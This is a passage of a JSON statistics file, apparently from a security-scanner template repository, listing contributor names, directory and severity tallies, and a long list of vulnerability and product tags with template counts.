rubinstien","count":1},{"name":"kchason","count":1},{"name":"kagamigawa","count":1},{"name":"absshax","count":1},{"name":"myst7ic","count":1},{"name":"manasmbellani","count":1},{"name":"napgh0st","count":1},{"name":"prettyboyaaditya","count":1},{"name":"christbowel","count":1},{"name":"alex","count":1},{"name":"0xd0ff9","count":1},{"name":"watchtowr","count":1},{"name":"guax1","count":1},{"name":"shifacyclewla","count":1},{"name":"0xprial","count":1},{"name":"rumble773","count":1},{"name":"manuelbua","count":1},{"name":"0xtavian","count":1},{"name":"danigoland","count":1},{"name":"jc175","count":1},{"name":"h4kux","count":1},{"name":"s1r1u5_","count":1},{"name":"exceed","count":1},{"name":"amir-h-fallahi","count":1},{"name":"schniggie","count":1},{"name":"hczdmr","count":1},{"name":"philippdelteil","count":1},{"name":"ofjaaah","count":1},{"name":"whotwagner","count":1},{"name":"failopen","count":1},{"name":"h4sh5","count":1},{"name":"ptonewreckin","count":1},{"name":"ilovebinbash","count":1},{"name":"bughuntersurya","count":1},{"name":"miguelsegoviagil","count":1},{"name":"yashgoti","count":1},{"name":"momen eldawakhly","count":1},{"name":"allenwest24","count":1},{"name":"imhunterand","count":1},{"name":"mbmy","count":1},{"name":"bartu utku sarp","count":1},{"name":"smaranchand","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"hexcat","count":1},{"name":"chron0x","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"cbadke","count":1},{"name":"drewvravick","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"sinsinology","count":1},{"name":"borna nematzadeh","count":1},{"name":"ooooooo_q","count":1},{"name":"lbb","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"w8ay","count":1},{"name":"zeyad azima","count":1},{"name":"andysvints","count":1},{"name":"xcapri","count":1},{"name":"d4ly","count":1},{"name":"petergrifin","count":1},{"name":"matt miller","count":1},{"name":"fmunozs","count":1},{"name":"mayankpandey01","count":1},{"name":"patrick pirker","count":1},{"name":"anon-artist","count":1},{"name":"ling","count":1},{"name":"unp4ck","count":1}],"directory":[{"name":"http","count":7547},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":134},{"name":"cloud","count":99},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":12},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"passive","count":1}],"severity":[{"name":"info","count":3697},{"name":"high","count":1770},{"name":"medium","count":1528},{"name":"critical","count":1044},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2540},{"name":"panel","count":1163},{"name":"wordpress","count":996},{"name":"exposure","count":955},{"name":"xss","count":913},{"name":"wp-plugin","count":865},{"name":"osint","count":804},{"name":"tech","count":694},{"name":"lfi","count":670},{"name":"misconfig","count":660},{"name":"rce","count":610},{"name":"edb","count":597},{"name":"packetstorm","count":542},{"name":"wpscan","count":505},{"name":"cve2021","count":493},{"name":"cve2022","count":472},{"name":"wp","count":431},{"name":"cve2023","count":384},{"name":"unauth","count":368},{"name":"sqli","count":361},{"name":"file","count":345},{"name":"authenticated","count":343},{"name":"intrusive","count":310},{"name":"detect","count":308},{"name":"login","count":295},{"name":"kev","count":275},{"name":"cve2020","count":255},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":221},{"name":"default-login","count":217},{"name":"devops","count":212},{"name":"osint-social","count":210},{"name":"malware","count":208},{"name":"network","count":196},{"name":"apache","count":193},{"name":"token","count":193},{"name":"","count":191},{"name":"cve2018","count":170},{"name":"cloud","count":169},{"name":"iot","count":167},{"name":"cve2019","count":163},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"redirect","count":138},{"name":"tcp","count":137},{"name":"aws","count":135},{"name":"auth-bypass","count":133},{"name":"ssrf","count":120},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cve2024","count":114},{"name":"cms","count":113},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":71},{"name":"oss","count":68},{"name":"cisco","count":67},{"name":"js","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"k8s","count":62},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"detection","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"php","count":45},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"generic","count":44},{"name":"jndi","count":44},{"name":"deserialization","count":43},{"name":"microsoft","count":42},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"cnvd","count":41},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":38},{"name":"miscellaneous","count":38},{"name":"listing","count":38},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"k8s-cluster-security","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"devsecops","count":32},{"name":"dlink","count":31},{"name":"osint-tech","count":31},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"ec2","count":30},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"lfr","count":27},{"name":"proxy","count":27},{"name":"dns","count":27},{"name":"bestwebsoft","count":27},{"name":"ssh","count":26},{"name":"cve2012","count":26},{"name":"zohocorp","count":26},{"name":"firewall","count":26},{"name":"manageengine","count":25},{"name":"weaver","count":25},{"name":"file-upload","count":25},{"name":"osint-finance","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"admin","count":24},{"name":"osint-business","count":24},{"name":"zoho","count":24},{"name":"audit","count":23},{"name":"yonyou","count":23},{"name":"stored-xss","count":23},{"name":"xxe","count":23},{"name":"tomcat","count":23},{"name":"dast","count":22},{"name":"prestashop","count":22},{"name":"s3","count":22},{"name":"cicd","count":22},{"name":"github","count":22},{"name":"printer","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"msf","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"confluence","count":19},{"name":"struts","count":19},{"name":"apt","count":19},{"name":"node.js","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"vpn","count":18},{"name":"osint-music","count":18},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"microweber","count":17},{"name":"headless","count":17},{"name":"nginx","count":17},{"name":"azure","count":17},{"name":"service","count":16},{"name":"rconfig","count":16},{"name":"osint-blog","count":16},{"name":"magento","count":16},{"name":"cve2009","count":16},{"name":"zyxel","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"backup","count":16},{"name":"jarm","count":16},{"name":"backdoor","count":16},{"name":"tongda","count":15},{"name":"netgear","count":15},{"name":"redhat","count":15},{"name":"nagios","count":15},{"name":"moosocial","count":15},{"name":"dashboard","count":15},{"name":"cve2013","count":15},{"name":"installer","count":15},{"name":"docker","count":15},{"name":"cve2008","count":15},{"name":"ssti","count":15},{"name":"cnvd2021","count":15},{"name":"info-leak","count":15},{"name":"seeyon","count":15},{"name":"setup","count":15},{"name":"ivanti","count":15},{"name":"woocommerce","count":15},{"name":"bypass","count":15},{"name":"java","count":15},{"name":"ruby","count":15},{"name":"redis","count":14},{"name":"osint-health","count":14},{"name":"domainmod","count":14},{"name":"icewarp","count":14},{"name":"dell","count":14},{"name":"rds","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"nodejs","count":14},{"name":"npm","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"git","count":14},{"name":"creds-stuffing","count":14},{"name":"laravel","count":13},{"name":"fuzzing","count":13},{"name":"fortigate","count":13},{"name":"mysql","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"postgresql","count":13},{"name":"cuppa","count":13},{"name":"windows","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"hashicorp","count":13},{"name":"rails","count":13},{"name":"airflow","count":13},{"name":"osint-dating","count":13},{"name":"auth","count":13},{"name":"abstractapi","count":13},{"name":"zimbra","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"netsweeper","count":12},{"name":"smb","count":12},{"name":"phpgurukul","count":12},{"name":"jetbrains","count":12},{"name":"ofbiz","count":12},{"name":"webserver","count":12},{"name":"deployments","count":12},{"name":"kafka","count":12},{"name":"drupal","count":12},{"name":"doppler","count":12},{"name":"osint-video","count":11},{"name":"hikvision","count":11},{"name":"prometheus","count":11},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"fastjson","count":11},{"name":"xwiki","count":11},{"name":"xstream","count":11},{"name":"iam","count":11},{"name":"dedecms","count":11},{"name":"glpi","count":11},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"db","count":10},{"name":"solr","count":10},{"name":"dahua","count":10},{"name":"elasticsearch","count":10},{"name":"solarview","count":10},{"name":"crlf","count":10},{"name":"xstream_project","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"phpmyadmin","count":10},{"name":"dropbox","count":10},{"name":"progress","count":10},{"name":"thinkphp","count":10},{"name":"blind","count":10},{"name":"bitbucket","count":9},{"name":"pfsense","count":9},{"name":"kube","count":9},{"name":"scada","count":9},{"name":"gateway","count":9},{"name":"exchange","count":9},{"name":"facebook","count":9},{"name":"console","count":9},{"name":"wso2","count":9},{"name":"cnvd2020","count":9},{"name":"sophos","count":9},{"name":"opencats","count":9},{"name":"firebase","count":9},{"name":"elastic","count":9},{"name":"lucee","count":9},{"name":"artica","count":9},{"name":"gitea","count":9},{"name":"moodle","count":9},{"name":"cloudtrail","count":9},{"name":"druid","count":9},{"name":"secret","count":9},{"name":"python","count":9},{"name":"joomla\\!","count":9},{"name":"instrusive","count":9},{"name":"sangfor","count":9},{"name":"f5","count":9},{"name":"vcenter","count":9},{"name":"versa","count":9},{"name":"go","count":8},{"name":"nexus","count":8},{"name":"oauth","count":8},{"name":"solarwinds","count":8},{"name":"nagiosxi","count":8},{"name":"recon","count":8},{"name":"cacti","count":8},{"name":"emerge","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"atom","count":8},{"name":"openemr","count":8},{"name":"lfprojects","count":8},{"name":"hms","count":8},{"name":"phpjabbers","count":8},{"name":"mlflow","count":8},{"name":"e-office","count":8},{"name":"ognl","count":8},{"name":"odoo","count":8},{"name":"metadata","count":8},{"name":"discord","count":8},{"name":"microfocus","count":8},{"name":"osint-news","count":8},{"name":"config-audit","count":8},{"name":"spotweb_project","count":8},{"name":"cisco-switch","count":8},{"name":"bucket","count":8},{"name":"spotweb","count":8},{"name":"phpinfo","count":8},{"name":"unauthenticated","count":8},{"name":"symantec","count":8},{"name":"mirai","count":8},{"name":"wanhu","count":8},{"name":"default-page","count":8},{"name":"huawei","count":8},{"name":"vrealize","count":7},{"name":"opensis","count":7},{"name":"vms","count":7},{"name":"ldap","count":7},{"name":"bloofox","count":7},{"name":"mobileiron","count":7},{"name":"blockchain","count":7},{"name":"landray","count":7},{"name":"squirrelmail","count":7},{"name":"rfi","count":7},{"name":"filemanager","count":7},{"name":"error","count":7},{"name":"moodating","count":7},{"name":"pmb","count":7},{"name":"gradio","count":7},{"name":"database","count":7},{"name":"telesquare","count":7},{"name":"vpc","count":7},{"name":"fortios","count":7},{"name":"mongodb","count":7},{"name":"maps","count":7},{"name":"nortekcontrol","count":7},{"name":"contec","count":7},{"name":"slack","count":7},{"name":"exploitdb","count":7},{"name":"twitter","count":7},{"name":"linkedin","count":7},{"name":"nacos","count":7},{"name":"monstra","count":7},{"name":"keking","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"pods","count":7},{"name":"shopify","count":7},{"name":"teamcity","count":7},{"name":"bigip","count":7},{"name":"ruckus","count":7},{"name":"avtech","count":7},{"name":"gogs","count":7},{"name":"websphere","count":7},{"name":"fpd","count":7},{"name":"oos","count":7},{"name":"activemq","count":7},{"name":"cobbler","count":6},{"name":"keycloak","count":6},{"name":"magmi","count":6},{"name":"rat","count":6},{"name":"jetty","count":6},{"name":"sql","count":6},{"name":"typo3","count":6},{"name":"microstrategy","count":6},{"name":"liferay","count":6},{"name":"sonarqube","count":6},{"name":"log","count":6},{"name":"online_fire_reporting_system_project","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"zhiyuan","count":6},{"name":"bmc","count":6},{"name":"jeecg","count":6},{"name":"synacor","count":6},{"name":"leak","count":6},{"name":"servicenow","count":6},{"name":"gcp","count":6},{"name":"plesk","count":6},{"name":"asp","count":6},{"name":"cockpit","count":6},{"name":"minio","count":6},{"name":"paypal","count":6},{"name":"kubelet","count":6},{"name":"asus","count":6},{"name":"security","count":6},{"name":"jamf","count":6},{"name":"beyondtrust","count":6},{"name":"online-fire-reporting","count":6},{"name":"tikiwiki","count":6},{"name":"chanjet","count":6},{"name":"mikrotik","count":6},{"name":"splunk","count":6},{"name":"openvpn","count":6},{"name":"express","count":6},{"name":"paloaltonetworks","count":6},{"name":"doctor-appointment-system","count":6},{"name":"advantech","count":6},{"name":"flutterwave","count":6},{"name":"74cms","count":6},{"name":"couchdb","count":6},{"name":"server","count":6},{"name":"elfinder","count":6},{"name":"webmin","count":6},{"name":"geoserver","count":6},{"name":"api-server","count":5},{"name":"mssql","count":5},{"name":"froxlor","count":5},{"name":"carrental","count":5},{"name":"adb","count":5},{"name":"craftcms","count":5},{"name":"voip","count":5},{"name":"qdpm","count":5},{"name":"open-emr","count":5},{"name":"tibco","count":5},{"name":"resin","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"sentry","count":5},{"name":"genetechsolutions","count":5},{"name":"adminer","count":5},{"name":"blackenergy","count":5},{"name":"firmware","count":5},{"name":"openfire","count":5},{"name":"asana","count":5},{"name":"pyload","count":5},{"name":"metinfo","count":5},{"name":"graylog","count":5},{"name":"web3","count":5},{"name":"openstack","count":5},{"name":"openai","count":5},{"name":"cloudflare","count":5},{"name":"redmine","count":5},{"name":"goanywhere","count":5},{"name":"digitaldruid","count":5},{"name":"etcd","count":5},{"name":"dionaea","count":5},{"name":"sftp","count":5},{"name":"mantisbt","count":5},{"name":"jwt","count":5},{"name":"magmi_project","count":5},{"name":"matrix","count":5},{"name":"hpe","count":5},{"name":"papercut","count":5},{"name":"jupyter","count":5},{"name":"square","count":5},{"name":"awstats","count":5},{"name":"xmlrpc","count":5},{"name":"terramaster","count":5},{"name":"hoteldruid","count":5},{"name":"nuuo","count":5},{"name":"parallels","count":5},{"name":"crushftp","count":5},{"name":"strapi","count":5},{"name":"tenda","count":5},{"name":"checkpoint","count":5},{"name":"kkfileview","count":5},{"name":"circontrol","count":5},{"name":"10web","count":5},{"name":"acm","count":5},{"name":"wpdevart","count":5},{"name":"password","count":5},{"name":"schneider-electric","count":5},{"name":"cve2007","count":5},{"name":"react","count":5},{"name":"qnap","count":5},{"name":"apisix","count":5},{"name":"avideo","count":5},{"name":"axigen","count":5},{"name":"gocd","count":5},{"name":"decision-center","count":5},{"name":"wbce","count":5},{"name":"http","count":5},{"name":"storage","count":5},{"name":"gnu","count":5},{"name":"fatpipe","count":5},{"name":"totolink","count":5},{"name":"cdata","count":5},{"name":"akamai","count":5},{"name":"webview","count":5},{"name":"ethereum","count":5},{"name":"percha","count":5},{"name":"agentejo","count":5},{"name":"webkul","count":5},{"name":"caucho","count":5},{"name":"chamilo","count":5},{"name":"spark","count":5},{"name":"sysaid","count":5},{"name":"glpi-project","count":5},{"name":"ems","count":5},{"name":"thedigitalcraft","count":5},{"name":"zzzcms","count":5},{"name":"hybris","count":5},{"name":"jabber","count":5},{"name":"telerik","count":5},{"name":"rseenet","count":5},{"name":"swagger","count":5},{"name":"connectwise","count":5},{"name":"circarlife","count":5},{"name":"avaya","count":5},{"name":"cnvd2023","count":5},{"name":"elementor","count":5},{"name":"harmistechnology","count":4},{"name":"grav","count":4},{"name":"pmb_project","count":4},{"name":"moveit","count":4},{"name":"zte","count":4},{"name":"osgeo","count":4},{"name":"juniper","count":4},{"name":"mostracms","count":4},{"name":"linkerd","count":4},{"name":"eclipse","count":4},{"name":"mautic","count":4},{"name":"auieo","count":4},{"name":"sendgrid","count":4},{"name":"shiro","count":4},{"name":"stripe","count":4},{"name":"hospital_management_system_project","count":4},{"name":"metersphere","count":4},{"name":"kevinlab","count":4},{"name":"datadog","count":4},{"name":"newstatpress","count":4},{"name":"centos","count":4},{"name":"kibana","count":4},{"name":"linksys","count":4},{"name":"pluginus","count":4},{"name":"ampache","count":4},{"name":"d-link","count":4},{"name":"newstatpress_project","count":4},{"name":"creativeitem","count":4},{"name":"aria","count":4},{"name":"sugarcrm","count":4},{"name":"ransomware","count":4},{"name":"sigb","count":4},{"name":"djangoproject","count":4},{"name":"webshell","count":4},{"name":"angular","count":4},{"name":"owncloud","count":4},{"name":"pip","count":4},{"name":"rabbitmq","count":4},{"name":"horde","count":4},{"name":"reprisesoftware","count":4},{"name":"imgproxy","count":4},{"name":"confluent","count":4},{"name":"httpd","count":4},{"name":"containers","count":4},{"name":"kentico","count":4},{"name":"pixie","count":4},{"name":"wcs","count":4},{"name":"ghost","count":4},{"name":"mailchimp","count":4},{"name":"esri","count":4},{"name":"search","count":4},{"name":"telegram","count":4},{"name":"proftpd","count":4},{"name":"webmail","count":4},{"name":"bamboo","count":4},{"name":"mostra","count":4},{"name":"dahuasecurity","count":4},{"name":"audiocodes","count":4},{"name":"aura","count":4},{"name":"kyocera","count":4},{"name":"opencms","count":4},{"name":"sound4","count":4},{"name":"consul","count":4},{"name":"info","count":4},{"name":"globalprotect","count":4},{"name":"harbor","count":4},{"name":"mooveagency","count":4},{"name":"artifactory","count":4},{"name":"ray","count":4},{"name":"springcloud","count":4},{"name":"royalevent","count":4},{"name":"puppet","count":4},{"name":"zend","count":4},{"name":"ternaria","count":4},{"name":"hongfan","count":4},{"name":"roxy","count":4},{"name":"myeventon","count":4},{"name":"mitel","count":4},{"name":"casaos","count":4},{"name":"os4ed","count":4},{"name":"jellyfin","count":4},{"name":"flickr","count":4},{"name":"flink","count":4},{"name":"tiki","count":4},{"name":"nextjs","count":4},{"name":"wireguard","count":4},{"name":"igniterealtime","count":4},{"name":"codeigniter","count":4},{"name":"osint-archived","count":4},{"name":"env","count":4},{"name":"mcafee","count":4},{"name":"jorani","count":4},{"name":"flatpress","count":4},{"name":"postmessage","count":4},{"name":"h3c","count":4},{"name":"pie-register","count":4},{"name":"thimpress","count":4},{"name":"cnvd2022","count":4},{"name":"nosqli","count":4},{"name":"yeswiki","count":4},{"name":"learnpress","count":4},{"name":"panabit","count":4},{"name":"umbraco","count":4},{"name":"photo","count":4},{"name":"dolibarr","count":4},{"name":"intelbras","count":4},{"name":"eyoucms","count":4},{"name":"rubyonrails","count":4},{"name":"httpserver","count":4},{"name":"dom","count":4},{"name":"finicity","count":4},{"name":"codoso","count":4},{"name":"rocketchat","count":4},{"name":"dotnet","count":4},{"name":"hongdian","count":4},{"name":"okta","count":4},{"name":"wp-statistics","count":4},{"name":"thinkcmf","count":4},{"name":"pega","count":4},{"name":"phppgadmin","count":4},{"name":"prtg","count":4},{"name":"linuxfoundation","count":4},{"name":"heroku","count":4},{"name":"bitrix","count":4},{"name":"phpjabber","count":4},{"name":"articatech","count":4},{"name":"figma","count":4},{"name":"salesforce","count":4},{"name":"metabase","count":4},{"name":"supsystic","count":4},{"name":"panos","count":4},{"name":"ebs","count":4},{"name":"candidats","count":4},{"name":"aspose","count":4},{"name":"terra-master","count":4},{"name":"kingsoft","count":4},{"name":"churchcrm","count":4},{"name":"jfrog","count":4},{"name":"gnuboard","count":4},{"name":"seagate","count":4},{"name":"arcgis","count":4},{"name":"joomlamo","count":4},{"name":"cnvd2019","count":4},{"name":"pentaho","count":4},{"name":"age-encryption","count":4},{"name":"powerjob","count":4},{"name":"metasploit","count":4},{"name":"bittrex","count":4},{"name":"easypost","count":4},{"name":"cve2005","count":4},{"name":"veronalabs","count":4},{"name":"concrete","count":4},{"name":"jsf","count":4},{"name":"fit2cloud","count":4},{"name":"teampass","count":3},{"name":"cpanel","count":3},{"name":"fanwei","count":3},{"name":"wordfence","count":3},{"name":"casdoor","count":3},{"name":"nortek","count":3},{"name":"suitecrm","count":3},{"name":"covenant","count":3},{"name":"ueditor","count":3},{"name":"projectsend","count":3},{"name":"rubygems","count":3},{"name":"default","count":3},{"name":"glassfish","count":3},{"name":"automattic","count":3},{"name":"openwrt","count":3},{"name":"steve","count":3},{"name":"dzzoffice","count":3},{"name":"targa","count":3},{"name":"sns","count":3},{"name":"rackn","count":3},{"name":"r-seenet","count":3},{"name":"webtareas_project","count":3},{"name":"sofacy","count":3},{"name":"revive","count":3},{"name":"decision-server","count":3},{"name":"webtareas","count":3},{"name":"jitsi","count":3},{"name":"etsy","count":3},{"name":"sidekiq","count":3},{"name":"cloudwatch","count":3},{"name":"securepoint","count":3},{"name":"emqx","count":3},{"name":"opencart","count":3},{"name":"apollo","count":3},{"name":"3cx","count":3},{"name":"droneci","count":3},{"name":"httpbin","count":3},{"name":"h2o","count":3},{"name":"yii","count":3},{"name":"diagrams","count":3},{"name":"finecms","count":3},{"name":"monitorr","count":3},{"name":"osticket","count":3},{"name":"softwarepublico","count":3},{"name":"influxdb","count":3},{"name":"bitrix24","count":3},{"name":"kavita","count":3},{"name":"ixcache","count":3},{"name":"forum","count":3},{"name":"octobercms","count":3},{"name":"eshop","count":3},{"name":"adafruit","count":3},{"name":"afterlogic","count":3},{"name":"airtable","count":3},{"name":"pypi","count":3},{"name":"cas","count":3},{"name":"sonatype","count":3},{"name":"sudo","count":3},{"name":"circleci","count":3},{"name":"smuggling","count":3},{"name":"actuator","count":3},{"name":"trendnet","count":3},{"name":"gradle","count":3},{"name":"hfs","count":3},{"name":"lansweeper","count":3},{"name":"e-cology","count":3},{"name":"nifi","count":3},{"name":"soplanning","count":3},{"name":"petya","count":3},{"name":"axis2","count":3},{"name":"dotcms","count":3},{"name":"temenos","count":3},{"name":"e-mobile","count":3},{"name":"chatgpt","count":3},{"name":"contentful","count":3},{"name":"mapbox","count":3},{"name":"netflix","count":3},{"name":"mythic","count":3},{"name":"piwigo","count":3},{"name":"itop","count":3},{"name":"posh","count":3},{"name":"unifi","count":3},{"name":"xxljob","count":3},{"name":"thruk","count":3},{"name":"netfortris","count":3},{"name":"axway","count":3},{"name":"hsphere","count":3},{"name":"ruckuswireless","count":3},{"name":"self-hosted","count":3},{"name":"carel","count":3},{"name":"bash","count":3},{"name":"aptus","count":3},{"name":"messaging","count":3},{"name":"wpdeveloper","count":3},{"name":"zeit","count":3},{"name":"learndash","count":3},{"name":"webalizer","count":3},{"name":"qts","count":3},{"name":"magnolia","count":3},{"name":"netdata","count":3},{"name":"woodwing","count":3},{"name":"apple","count":3},{"name":"telnet","count":3},{"name":"inspur","count":3},{"name":"pandorafms","count":3},{"name":"structurizr","count":3},{"name":"nuxtjs","count":3},{"name":"backdrop","count":3},{"name":"anonymous","count":3},{"name":"idrac","count":3},{"name":"draytek","count":3},{"name":"fileman","count":3},{"name":"intercom","count":3},{"name":"rstudio","count":3},{"name":"contribsys","count":3},{"name":"mongo","count":3},{"name":"gibbon","count":3},{"name":"digital-watchdog","count":3},{"name":"wwbn","count":3},{"name":"avada","count":3},{"name":"switch","count":3},{"name":"revive-adserver","count":3},{"name":"fastly","count":3},{"name":"sharepoint","count":3},{"name":"listserv","count":3},{"name":"xerox","count":3},{"name":"veeam","count":3},{"name":"openbmcs","count":3},{"name":"phpipam","count":3},{"name":"labkey","count":3},{"name":"rlm","count":3},{"name":"jeesns","count":3},{"name":"watchguard","count":3},{"name":"gvectors","count":3},{"name":"limesurvey","count":3},{"name":"webadmin","count":3},{"name":"dubbo","count":3},{"name":"graph","count":3},{"name":"forgerock","count":3},{"name":"lighttpd","count":3},{"name":"grp","count":3},{"name":"reddit","count":3},{"name":"dos","count":3},{"name":"adiscon","count":3},{"name":"cookie","count":3},{"name":"credential","count":3},{"name":"imap","count":3},{"name":"boldgrid","count":3},{"name":"digitalrebar","count":3},{"name":"zendesk","count":3},{"name":"strangerstudios","count":3},{"name":"monitor","count":3},{"name":"clusterengine","count":3},{"name":"thefactory","count":3},{"name":"saltstack","count":3},{"name":"modoboa","count":3},{"name":"tableau","count":3},{"name":"tplus","count":3},{"name":"thinfinity","count":3},{"name":"samba","count":3},{"name":"empirecms","count":3},{"name":"payara","count":3},{"name":"electron","count":3},{"name":"sony","count":3},{"name":"axis","count":3},{"name":"loytec","count":3},{"name":"getsimple","count":3},{"name":"postman","count":3},{"name":"yzmcms","count":3},{"name":"geowebserver","count":3},{"name":"dvr","count":3},{"name":"ampps","count":3},{"name":"cluster","count":3},{"name":"webkul-qloapps","count":3},{"name":"siemens","count":3},{"name":"weiphp","count":3},{"name":"trixbox","count":3},{"name":"clientid","count":3},{"name":"dreambox","count":3},{"name":"buffalo","count":3},{"name":"processwire","count":3},{"name":"newsletter","count":3},{"name":"western_digital","count":3},{"name":"rpm","count":3},{"name":"passcv","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"vercel","count":3},{"name":"ninjaforms","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"redash","count":3},{"name":"webnus","count":3},{"name":"sqlite","count":3},{"name":"modem","count":3},{"name":"synology","count":3},{"name":"truenas","count":3},{"name":"selenium","count":3},{"name":"ansible","count":3},{"name":"superset","count":3},{"name":"i3geo","count":3},{"name":"favicon","count":3},{"name":"selea","count":3},{"name":"shell","count":3},{"name":"zerof","count":3},{"name":"waf","count":3},{"name":"mailgun","count":3},{"name":"spotify","count":3},{"name":"school_dormitory_management_system_project","count":3},{"name":"dokuwiki","count":3},{"name":"rancher","count":3},{"name":"lotus","count":3},{"name":"discourse","count":3},{"name":"fanruan","count":3},{"name":"epson","count":3},{"name":"spip","count":3},{"name":"nc","count":3},{"name":"javascript","count":3},{"name":"segment","count":3},{"name":"pulsar","count":3},{"name":"sitemap","count":3},{"name":"superwebmailer","count":3},{"name":"subrion","count":3},{"name":"xoops","count":3},{"name":"fuelcms","count":3},{"name":"openam","count":3},{"name":"movable","count":3},{"name":"flexvnf","count":3},{"name":"ad","count":3},{"name":"webcam","count":3},{"name":"octoprint","count":3},{"name":"cgi","count":3},{"name":"backdropcms","count":3},{"name":"dotnetnuke","count":3},{"name":"netlify","count":3},{"name":"flutter","count":3},{"name":"voipmonitor","count":3},{"name":"qlik","count":3},{"name":"cybelesoft","count":3},{"name":"tautulli","count":3},{"name":"sharefile","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"aruba","count":3},{"name":"kfm","count":3},{"name":"bigant","count":3},{"name":"superadmin","count":3},{"name":"passive","count":3},{"name":"evlink","count":3},{"name":"instagram","count":3},{"name":"drawio","count":3},{"name":"zeroshell","count":3},{"name":"key","count":3},{"name":"copyparty","count":3},{"name":"std42","count":3},{"name":"nuget","count":3},{"name":"particle","count":3},{"name":"mpsec","count":3},{"name":"esafenet","count":3},{"name":"ithemes","count":3},{"name":"academylms","count":3},{"name":"dynamicweb","count":2},{"name":"contao","count":2},{"name":"htmli","count":2},{"name":"digitalzoomstudio","count":2},{"name":"cassandra","count":2},{"name":"mybb","count":2},{"name":"encryption","count":2},{"name":"poisoning","count":2},{"name":"tshirtecommerce","count":2},{"name":"wipro","count":2},{"name":"relatedposts","count":2},{"name":"pbootcms","count":2},{"name":"seacms","count":2},{"name":"w3-total-cache","count":2},{"name":"memory","count":2},{"name":"clansphere","count":2},{"name":"advanced-booking-calendar","count":2},{"name":"livehelperchat","count":2},{"name":"plugins-market","count":2},{"name":"wpqa","count":2},{"name":"tornado","count":2},{"name":"tidb","count":2},{"name":"viewpoint","count":2},{"name":"mf_gig_calendar_project","count":2},{"name":"akkadianlabs","count":2},{"name":"minidionis","count":2},{"name":"jeedom","count":2},{"name":"phpldapadmin","count":2},{"name":"rapid7","count":2},{"name":"netsparker","count":2},{"name":"wuzhicms","count":2},{"name":"mailer","count":2},{"name":"virtua","count":2},{"name":"hasura","count":2},{"name":"konga","count":2},{"name":"fcm","count":2},{"name":"stock-ticker","count":2},{"name":"nuxeo","count":2},{"name":"cve2001","count":2},{"name":"myfactory","count":2},{"name":"aspcms","count":2},{"name":"wpchill","count":2},{"name":"pgadmin","count":2},{"name":"seowon","count":2},{"name":"keybase","count":2},{"name":"bigbluebutton","count":2},{"name":"adc","count":2},{"name":"gallery","count":2},{"name":"secnet","count":2},{"name":"securenvoy","count":2},{"na